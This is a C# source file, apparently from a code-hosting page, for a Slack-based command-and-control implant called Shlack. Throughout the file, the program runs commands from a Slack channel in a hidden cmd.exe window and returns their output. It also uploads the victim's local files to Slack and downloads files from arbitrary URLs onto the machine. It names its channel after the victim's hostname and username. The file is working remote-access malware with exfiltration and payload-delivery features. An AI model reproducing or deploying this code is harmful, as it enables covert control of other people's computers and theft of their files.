-
Notifications
You must be signed in to change notification settings - Fork 1
/
Shlack.cs
150 lines (134 loc) · 6.54 KB
/
Shlack.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
using System;
using System.Diagnostics;
using SlackAPI;
using System.Threading;
namespace Shlack_C2
{
class Program
{
static void Main(string[] args)
{
string slack_token = "xoxb-TokenHere"; //CHANGE THIS
string oauth_token = "xoxp-TokenHere"; //CHANGE THIS
string targetID = ""; //This is to only accept messages sent through the created channel. Otherwise, any message received by the bot is to be executed.
ManualResetEventSlim clientReady = new ManualResetEventSlim(false);
SlackSocketClient client = new SlackSocketClient(slack_token);
SlackSocketClient oauth_client = new SlackSocketClient(oauth_token);
client.Connect((connected) => {
// This is called once the client has emitted the RTM start command
clientReady.Set();
}, () => {
// This is called once the RTM client has connected to the end point
});
client.OnMessageReceived += (message) =>
{
// Handle each message as you receive them
if (message.bot_id == null && targetID == message.channel) //Only execute messages sent by users
{
switch (message.text.ToLower().Split(' ')[0])
{
case "exit": //Terminate the shell
client.PostMessage(null, message.channel.ToString(), "Channel Terminated!");
Thread.Sleep(20);
Environment.Exit(1);
break;
case "upload": //Upload local files to Slack channel
string[] ch = new string[1];
ch[0] = message.channel.ToString();
try
{
string path = message.text.ToLower().Split(new[] { ' ' }, 2)[1];
client.UploadFile(null, System.IO.File.ReadAllBytes(path), System.IO.Path.GetFileName(path), ch);
}
catch (Exception e)
{
client.PostMessage(null, message.channel.ToString(), e.Message);
}
break;
case "download": //Download files to the victim .. download [URL] [NameOfFile/Path]
string @remoteUri = message.text.Split(new[] { ' ' }, 3)[1];
string @fileName = message.text.Split(new[] { ' ' }, 3)[2];
using (var down = new System.Net.WebClient())
{
try
{
remoteUri = remoteUri.Replace(">", "");
remoteUri = remoteUri.Replace("<", "");
down.DownloadFile(@remoteUri, @fileName);
client.PostMessage(null, message.channel.ToString(), "Downloaded successfully.");
}
catch (Exception e)
{
client.PostMessage(null, message.channel.ToString(), e.Message.ToString());
}
break;
}
default: //Execute command if no keywords used
string output = Execute(message.text);
client.PostMessage(null, message.channel.ToString(), "```" + output + "```");
break;
}
}
};
clientReady.Wait();
string chan_name = (System.Net.Dns.GetHostName() + "_" + Environment.UserName).ToLower(); //Grab Hostname and Username for the channel name
client.GetChannelList(null);
var general = client.Channels.Find(x => x.name.Equals("general"));
oauth_client.ChannelsCreate((response) => { //Create channel and assigne the targetID
if (response.ok)
{
client.PostMessage(null, general.id, "[+] Channel " + chan_name + " is created. Have fun :)");
targetID = response.channel.id.ToString();
}
else if (response.error == "name_taken")
{
client.PostMessage(null, general.id, "[*] Channel " + chan_name + " is already exists.");
targetID = client.Channels.Find(x => x.name.Equals(chan_name)).id;
}
else
{
client.PostMessage(null, general.id, "[-] Channel " + chan_name + " " + response.error.ToString());
}
}, chan_name);
while (true) { Thread.Sleep(1000); }
}
public static string Execute(string cmd) //Excute command in cmd.exe
{
cmd = Contaminate(cmd);
try
{
// Start the child process.
Process p = new Process();
// Redirect the output stream of the child process.
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.Arguments = "/c" + cmd;
p.Start();
// Do not wait for the child process to exit before
// reading to the end of its redirected stream.
// p.WaitForExit();
// Read the output stream first and then wait.
string output = p.StandardOutput.ReadToEnd();
string error = p.StandardError.ReadToEnd();
p.WaitForExit();
return error + output;
}
catch (Exception e)
{
return e.Message;
}
}
public static string Contaminate(string original) //This just replaces sanitized chars
{
string edited = original;
edited = edited.Replace(">", ">");
edited = edited.Replace("<", "<");
edited = edited.Replace("&", "&");
return edited;
}
}
}